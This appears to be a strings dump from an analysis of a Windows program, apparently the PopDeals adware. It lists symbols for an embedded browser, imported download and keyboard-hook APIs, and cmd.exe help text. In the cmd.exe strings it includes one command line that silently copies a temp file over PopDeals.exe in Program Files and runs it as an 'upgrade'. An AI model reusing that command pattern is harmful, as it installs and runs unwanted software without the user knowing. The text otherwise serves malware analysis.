@Shdocvw_tlb@TCppShellUIHelper@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellUIHelper@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellUIHelper@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellUIHelper@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellUIHelper@Connect$qqrv
@Shdocvw_tlb@TCppShellUIHelper@Connect$qqrv
@Shdocvw_tlb@TCppShellUIHelper@ConnectTo$qqr87%TComInterface$26Shdocvw_tlb@IShellUIHelperpx5_GUID$e&@Shdocvw_tlb@IID_IShellUIHelper$%
@Shdocvw_tlb@TCppShellUIHelper@ConnectTo$qqr87%TComInterface$26Shdocvw_tlb@IShellUIHelperpx5_GUID$e&@Shdocvw_tlb@IID_IShellUIHelper$%
@Shdocvw_tlb@TCppShellUIHelper@Disconnect$qqrv
@Shdocvw_tlb@TCppShellUIHelper@Disconnect$qqrv
@Shdocvw_tlb@TCppShellUIHelper@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellUIHelper@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellUIHelper@GetDunk$qqrv
@Shdocvw_tlb@TCppShellUIHelper@GetDunk$qqrv
@Shdocvw_tlb@TCppShellUIHelper@InitServerData$qqrv
@Shdocvw_tlb@TCppShellUIHelper@InitServerData$qqrv
@Shdocvw_tlb@TCppShellWindows@
@Shdocvw_tlb@TCppShellWindows@
@Shdocvw_tlb@TCppShellWindows@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellWindows@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellWindows@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellWindows@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellWindows@Connect$qqrv
@Shdocvw_tlb@TCppShellWindows@Connect$qqrv
@Shdocvw_tlb@TCppShellWindows@ConnectTo$qqr85%TComInterface$25Shdocvw_tlb@IShellWindowspx5_GUID$e&@Shdocvw_tlb@IID_IShellWindows$%
@Shdocvw_tlb@TCppShellWindows@ConnectTo$qqr85%TComInterface$25Shdocvw_tlb@IShellWindowspx5_GUID$e&@Shdocvw_tlb@IID_IShellWindows$%
@Shdocvw_tlb@TCppShellWindows@Disconnect$qqrv
@Shdocvw_tlb@TCppShellWindows@Disconnect$qqrv
@Shdocvw_tlb@TCppShellWindows@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellWindows@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellWindows@GetDunk$qqrv
@Shdocvw_tlb@TCppShellWindows@GetDunk$qqrv
@Shdocvw_tlb@TCppShellWindows@InitServerData$qqrv
@Shdocvw_tlb@TCppShellWindows@InitServerData$qqrv
@Shdocvw_tlb@TCppShellWindows@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppShellWindows@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppWebBrowser@
@Shdocvw_tlb@TCppWebBrowser@
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrp6HWND__
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrp6HWND__
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrpv
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrpv
@Shdocvw_tlb@TCppWebBrowser@CControlData
@Shdocvw_tlb@TCppWebBrowser@CControlData
@Shdocvw_tlb@TCppWebBrowser@ClientToWindow$qqrpit1
@Shdocvw_tlb@TCppWebBrowser@ClientToWindow$qqrpit1
@Shdocvw_tlb@TCppWebBrowser@CreateControl$qqrv
@Shdocvw_tlb@TCppWebBrowser@CreateControl$qqrv
@Shdocvw_tlb@TCppWebBrowser@DEF_CTL_INTF
@Shdocvw_tlb@TCppWebBrowser@DEF_CTL_INTF
@Shdocvw_tlb@TCppWebBrowser@EventDispIDs
@Shdocvw_tlb@TCppWebBrowser@EventDispIDs
@Shdocvw_tlb@TCppWebBrowser@ExecWB$qqr20Shdocvw_tlb@OLECMDID25Shdocvw_tlb@OLECMDEXECOPTp10tagVARIANTt3
@Shdocvw_tlb@TCppWebBrowser@ExecWB$qqr20Shdocvw_tlb@OLECMDID25Shdocvw_tlb@OLECMDEXECOPTp10tagVARIANTt3
@Shdocvw_tlb@TCppWebBrowser@GetDefaultInterface$qqrv
@Shdocvw_tlb@TCppWebBrowser@GetDefaultInterface$qqrv
@Shdocvw_tlb@TCppWebBrowser@GetProperty$qqrpb
@Shdocvw_tlb@TCppWebBrowser@GetProperty$qqrpb
@Shdocvw_tlb@TCppWebBrowser@GetWordBoolProp$qqri
@Shdocvw_tlb@TCppWebBrowser@GetWordBoolProp$qqri
@Shdocvw_tlb@TCppWebBrowser@GoBack$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoBack$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoForward$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoForward$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoHome$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoHome$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoSearch$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoSearch$qqrv
@Shdocvw_tlb@TCppWebBrowser@InitControlData$qqrv
@Shdocvw_tlb@TCppWebBrowser@InitControlData$qqrv
@Shdocvw_tlb@TCppWebBrowser@Navigate$qqrpbp10tagVARIANTt2t2t2
@Shdocvw_tlb@TCppWebBrowser@Navigate$qqrpbp10tagVARIANTt2t2t2
@Shdocvw_tlb@TCppWebBrowser@Navigate2$qqrp10tagVARIANTt1t1t1t1
@Shdocvw_tlb@TCppWebBrowser@Navigate2$qqrp10tagVARIANTt1t1t1t1
@Shdocvw_tlb@TCppWebBrowser@OptParam
@Shdocvw_tlb@TCppWebBrowser@OptParam
@Shdocvw_tlb@TCppWebBrowser@PutProperty$qqrpb10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser@PutProperty$qqrpb10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser@QueryStatusWB$qqr20Shdocvw_tlb@OLECMDID
@Shdocvw_tlb@TCppWebBrowser@QueryStatusWB$qqr20Shdocvw_tlb@OLECMDID
@Shdocvw_tlb@TCppWebBrowser@Quit$qqrv
@Shdocvw_tlb@TCppWebBrowser@Quit$qqrv
@Shdocvw_tlb@TCppWebBrowser@Refresh$qqrv
@Shdocvw_tlb@TCppWebBrowser@Refresh$qqrv
@Shdocvw_tlb@TCppWebBrowser@Refresh2$qqrp10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser@Refresh2$qqrp10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser@SetWordBoolProp$qqrio
@Shdocvw_tlb@TCppWebBrowser@SetWordBoolProp$qqrio
@Shdocvw_tlb@TCppWebBrowser@ShowBrowserBar$qqrp10tagVARIANTt1t1
@Shdocvw_tlb@TCppWebBrowser@ShowBrowserBar$qqrp10tagVARIANTt1t1
@Shdocvw_tlb@TCppWebBrowser@Stop$qqrv
@Shdocvw_tlb@TCppWebBrowser@Stop$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Application$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Application$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Container$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Container$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Document$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Document$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Parent$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Parent$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@
@Shdocvw_tlb@TCppWebBrowser_V1@
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrp6HWND__
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrp6HWND__
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrpv
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrpv
@Shdocvw_tlb@TCppWebBrowser_V1@CControlData
@Shdocvw_tlb@TCppWebBrowser_V1@CControlData
@Shdocvw_tlb@TCppWebBrowser_V1@CreateControl$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@CreateControl$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@DEF_CTL_INTF
@Shdocvw_tlb@TCppWebBrowser_V1@DEF_CTL_INTF
@Shdocvw_tlb@TCppWebBrowser_V1@EventDispIDs
@Shdocvw_tlb@TCppWebBrowser_V1@EventDispIDs
@Shdocvw_tlb@TCppWebBrowser_V1@GetDefaultInterface$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GetDefaultInterface$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoBack$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoBack$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoForward$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoForward$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoHome$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoHome$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoSearch$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoSearch$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@InitControlData$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@InitControlData$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@Navigate$qqrpbp10tagVARIANTt2t2t2
@Shdocvw_tlb@TCppWebBrowser_V1@Navigate$qqrpbp10tagVARIANTt2t2t2
@Shdocvw_tlb@TCppWebBrowser_V1@OptParam
@Shdocvw_tlb@TCppWebBrowser_V1@OptParam
@Shdocvw_tlb@TCppWebBrowser_V1@Refresh$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@Refresh$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@Refresh2$qqrp10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser_V1@Refresh2$qqrp10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser_V1@Stop$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@Stop$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Application$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Application$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Container$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Container$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Document$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Document$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Parent$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Parent$qqrv
@Shdocvw_tlb@TShellFavoritesNameSpace@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TShellFavoritesNameSpace@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
Font.Charset
Font.Charset
Font.Color
Font.Color
Font.Height
Font.Height
Font.Name
Font.Name
Font.Style
Font.Style
CppWebBrowser1DocumentComplete
CppWebBrowser1DocumentComplete
Lines.Strings
Lines.Strings
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryA
GetWindowsDirectoryA
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
SetViewportOrgEx
SetViewportOrgEx
ShellExecuteA
ShellExecuteA
URLDownloadToFileA
URLDownloadToFileA
ActivateKeyboardLayout
ActivateKeyboardLayout
EnumThreadWindows
EnumThreadWindows
EnumWindows
EnumWindows
GetKeyNameTextA
GetKeyNameTextA
GetKeyState
GetKeyState
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardState
GetKeyboardState
GetKeyboardType
GetKeyboardType
LoadKeyboardLayoutA
LoadKeyboardLayoutA
MapVirtualKeyA
MapVirtualKeyA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
DeleteUrlCacheEntry
DeleteUrlCacheEntry
HttpOpenRequestA
HttpOpenRequestA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
.text
.text
`.data
`.data
.rdata
.rdata
P.idata
P.idata
@.edata
@.edata
@.rsrc
@.rsrc
@.reloc
@.reloc
URLD
URLD
o~.djus
o~.djus
Text exceeds memo capacity/Menu '%s' is already being used by another form
Text exceeds memo capacity/Menu '%s' is already being used by another form
JPEG error #%d
JPEG error #%d
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Variant is not an array5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Variant is not an array5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
Invalid variant operation!Invalid variant operation ($%.8x)
Invalid variant operation!Invalid variant operation ($%.8x)
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
$%s not in a class registration group
$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
DCOM not installed!'%s' is not a valid integer value"'%s' is not a valid currency value!'%g' is not a valid date and time
DCOM not installed!'%s' is not a valid integer value"'%s' is not a valid currency value!'%g' is not a valid date and time
I/O error %d
I/O error %d
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s.Seek not implemented$Operation not allowed on sorted list
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file %s
Cannot create file %s
Cannot open file %s
Cannot open file %s
cmd.exe_332:
.text
.text
`.data
`.data
.rsrc
.rsrc
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
SetConsoleInputExeNameW
SetConsoleInputExeNameW
APerformUnaryOperation: '%c'
APerformUnaryOperation: '%c'
APerformArithmeticOperation: '%c'
APerformArithmeticOperation: '%c'
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
MPR.dll
MPR.dll
RegEnumKeyW
RegEnumKeyW
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
ShellExecuteExW
ShellExecuteExW
CmdBatNotification
CmdBatNotification
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
_pipe
_pipe
GetProcessWindowStation
GetProcessWindowStation
cmd.pdb
cmd.pdb
CMD Internal Error %s
CMD Internal Error %s
)(&&())))(&))
)(&&())))(&))
)&((&)&))&())
)&((&)&))&())
)&((&)&)&()))
)&((&)&)&()))
)(&&()))&))))
)(&&()))&))))
CMD.EXE
CMD.EXE
()|&=,;"
()|&=,;"
COPYCMD
COPYCMD
\XCOPY.EXE
\XCOPY.EXE
CMDCMDLINE
CMDCMDLINE
WKERNEL32.DLL
WKERNEL32.DLL
Software\Policies\Microsoft\Windows\System
Software\Policies\Microsoft\Windows\System
0123456789
0123456789
cmd.exe
cmd.exe
DIRCMD
DIRCMD
%d.%d.d
%d.%d.d
Ungetting: '%s'
Ungetting: '%s'
DisableCMD
DisableCMD
GeToken: (%x) '%s'
GeToken: (%x) '%s'
%s\Shell\Open\Command
%s\Shell\Open\Command
%x %c
%x %c
*** Unknown type: %x
*** Unknown type: %x
Args: `%s'
Args: `%s'
Cmd: %s Type: %x
Cmd: %s Type: %x
%s (%s) %s
%s (%s) %s
choice /C Y /N /D Y /T 3 & copy /Y "%Documents and Settings%\%current user%\Local Settings\Temp\tmpB4.tmp" "%Program Files%\PopDeals\PopDeals.exe" & "%Program Files%\PopDeals\PopDeals.exe" upgrade
choice /C Y /N /D Y /T 3 & copy /Y "%Documents and Settings%\%current user%\Local Settings\Temp\tmpB4.tmp" "%Program Files%\PopDeals\PopDeals.exe" & "%Program Files%\PopDeals\PopDeals.exe" upgrade
am Files\PopDeals\PopDeals.exe"
am Files\PopDeals\PopDeals.exe"
Settings\Temp\tmpB4.tmp" "%Program Files%\PopDeals\PopDeals.exe"
Settings\Temp\tmpB4.tmp" "%Program Files%\PopDeals\PopDeals.exe"
tings\Temp\tmpB4.tmp" "%Program Files%\PopDeals\PopDeals.exe" & "%Program Files%\PopDeals\PopDeals.exe" upgrade
tings\Temp\tmpB4.tmp" "%Program Files%\PopDeals\PopDeals.exe" & "%Program Files%\PopDeals\PopDeals.exe" upgrade
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
CMDEXTVERSION
CMDEXTVERSION
KEYS
KEYS
%Program Files%\PopDeals
%Program Files%\PopDeals
%s %s
%s %s
%Documents and Settings%\%current user%\Local Settings\Temp\tmpB4.tmp
%Documents and Settings%\%current user%\Local Settings\Temp\tmpB4.tmp
(%s) %s
(%s) %s
%s %s%s
%s %s%s
&()[]{}^=;!%' ,`~
&()[]{}^=;!%' ,`~
d%sd%s
d%sd%s
-%sd%sd%sd
-%sd%sd%sd
d%sd%sd
d%sd%sd
%s=%s
%s=%s
X-X
X-X
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
-*/%()|^&=,
-*/%()|^&=,
\CMD.EXE
\CMD.EXE
Windows Command Processor
Windows Command Processor
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
Cmd.Exe
Cmd.Exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Press any key to continue . . . %0
Press any key to continue . . . %0
operable program or batch file.
operable program or batch file.
The system cannot execute the specified program.
The system cannot execute the specified program.
and press any key when ready. %0
and press any key when ready. %0
Microsoft Windows XP [Version %1]%0
Microsoft Windows XP [Version %1]%0
a pipe operation.
a pipe operation.
KEYS is on.
KEYS is on.
KEYS is off.
KEYS is off.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The switch /Y may be preset in the COPYCMD environment variable.
The switch /Y may be preset in the COPYCMD environment variable.
to prompt on overwrites unless COPY command is being executed from
to prompt on overwrites unless COPY command is being executed from
Switches may be preset in the DIRCMD environment variable. Override
Switches may be preset in the DIRCMD environment variable. Override
Quits the CMD.EXE program (command interpreter) or the current batch
Quits the CMD.EXE program (command interpreter) or the current batch
CMD.EXE. If executed from outside a batch script, it
CMD.EXE. If executed from outside a batch script, it
will quit CMD.EXE
will quit CMD.EXE
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
Displays or sets a search path for executable files.
Displays or sets a search path for executable files.
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Changes the cmd.exe command prompt.
Changes the cmd.exe command prompt.
$B | (pipe)
$B | (pipe)
$V Windows XP version number
$V Windows XP version number
Displays, sets, or removes cmd.exe environment variables.
Displays, sets, or removes cmd.exe environment variables.
Displays the Windows XP version.
Displays the Windows XP version.
Tells cmd.exe whether to verify that your files are written correctly to a
Tells cmd.exe whether to verify that your files are written correctly to a
Records comments (remarks) in a batch file or CONFIG.SYS.
Records comments (remarks) in a batch file or CONFIG.SYS.
Press any key to continue . . . %0
Press any key to continue . . . %0
Directs cmd.exe to a labeled line in a batch program.
Directs cmd.exe to a labeled line in a batch program.
NOT Specifies that Windows XP should carry out
NOT Specifies that Windows XP should carry out
will execute the command after the ELSE keyword if the
will execute the command after the ELSE keyword if the
I The new environment will be the original environment passed
I The new environment will be the original environment passed
to the cmd.exe and not the current environment.
to the cmd.exe and not the current environment.
SEPARATE Start 16-bit Windows program in separate memory space
SEPARATE Start 16-bit Windows program in separate memory space
SHARED Start 16-bit Windows program in shared memory space
SHARED Start 16-bit Windows program in shared memory space
If it is an internal cmd command or a batch file then
If it is an internal cmd command or a batch file then
the command processor is run with the /K switch to cmd.exe.
the command processor is run with the /K switch to cmd.exe.
If it is not an internal cmd command or batch file then
If it is not an internal cmd command or batch file then
parameters These are the parameters passed to the command/program
parameters These are the parameters passed to the command/program
under Windows XP.
under Windows XP.
Starts a new instance of the Windows XP command interpreter
Starts a new instance of the Windows XP command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
/D Disable execution of AutoRun commands from registry (see below)
/D Disable execution of AutoRun commands from registry (see below)
/A Causes the output of internal commands to a pipe or file to be ANSI
/A Causes the output of internal commands to a pipe or file to be ANSI
/U Causes the output of internal commands to a pipe or file to be
/U Causes the output of internal commands to a pipe or file to be
variable var at execution time. The %var% syntax expands variables
variable var at execution time. The %var% syntax expands variables
of an executable file.
of an executable file.
If /D was NOT specified on the command line, then when CMD.EXE starts, it
If /D was NOT specified on the command line, then when CMD.EXE starts, it
either or both are present, they are executed first.
either or both are present, they are executed first.
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
can enable or disable extensions for all invocations of CMD.EXE on a
can enable or disable extensions for all invocations of CMD.EXE on a
following REG_DWORD values in the registry using REGEDT32.EXE:
following REG_DWORD values in the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
can enable or disable completion for all invocations of CMD.EXE on a
can enable or disable completion for all invocations of CMD.EXE on a
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
at execution time.
at execution time.
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
completion for all invocations of CMD.EXE on a machine and/or user logon
completion for all invocations of CMD.EXE on a machine and/or user logon
the registry using REGEDT32.EXE:
the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
Shift key with the control character will move through the list
Shift key with the control character will move through the list
&()[]{}^=;!%' ,`~
&()[]{}^=;!%' ,`~
Command Processor Extensions enabled by default. Use CMD /? for details.
Command Processor Extensions enabled by default. Use CMD /? for details.
ASSOC [.ext[=[fileType]]]
ASSOC [.ext[=[fileType]]]
.ext Specifies the file extension to associate the file type with
.ext Specifies the file extension to associate the file type with
ASSOC .pl=PerlScript
ASSOC .pl=PerlScript
FTYPE PerlScript=perl.exe %%1 %%*
FTYPE PerlScript=perl.exe %%1 %%*
script.pl 1 2 3
script.pl 1 2 3
set PATHEXT=.pl;%%PATHEXT%%
set PATHEXT=.pl;%%PATHEXT%%
The restartable option to the COPY command is not supported by
The restartable option to the COPY command is not supported by
this version of the operating system.
this version of the operating system.
The following usage of the path operator in batch-parameter
The following usage of the path operator in batch-parameter
The unicode output option to CMD.EXE is not supported by this
The unicode output option to CMD.EXE is not supported by this
version of the operating system.
version of the operating system.
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the PROMPT command supports
If Command Extensions are enabled the PROMPT command supports
is pretty simple and supports the following operations, in decreasing
is pretty simple and supports the following operations, in decreasing
! ~ - - unary operators
! ~ - - unary operators
* / %% - arithmetic operators
* / %% - arithmetic operators
- - arithmetic operators
- - arithmetic operators
&= ^= |= >=
&= ^= |= >=
If you use any of the logical or modulus operators, you will need to
If you use any of the logical or modulus operators, you will need to
values. If SET /A is executed from the command line outside of a
values. If SET /A is executed from the command line outside of a
assignment operator requires an environment variable name to the left of
assignment operator requires an environment variable name to the left of
the assignment operator. Numeric values are decimal numbers, unless
the assignment operator. Numeric values are decimal numbers, unless
occurrence of the remaining portion of str1.
occurrence of the remaining portion of str1.
Finally, support for delayed environment variable expansion has been
Finally, support for delayed environment variable expansion has been
added. This support is always disabled by default, but may be
added. This support is always disabled by default, but may be
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
of text is read, not when it is executed. The following example
of text is read, not when it is executed. The following example
So the actual FOR loop we are executing is:
So the actual FOR loop we are executing is:
%Ã%% - expands to the current directory string.
%Ã%% - expands to the current directory string.
%ÚTE%% - expands to current date using same format as DATE command.
%ÚTE%% - expands to current date using same format as DATE command.
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDCMDLINE%% - expands to the original command line that invoked the
%%CMDCMDLINE%% - expands to the original command line that invoked the
If Command Extensions are enabled the SHIFT command supports
If Command Extensions are enabled the SHIFT command supports
control is passed to the statement after the label specified. You must
control is passed to the statement after the label specified. You must
%%4 %%5 ...)
%%4 %%5 ...)
CMD /? for details.
CMD /? for details.
This works because on old versions of CMD.EXE, SETLOCAL does NOT
This works because on old versions of CMD.EXE, SETLOCAL does NOT
command execution.
command execution.
non-executable files may be invoked through their file association just
non-executable files may be invoked through their file association just
by typing the name of the file as a command. (e.g. WORD.DOC would
by typing the name of the file as a command. (e.g. WORD.DOC would
launch the application associated with the .DOC file extension).
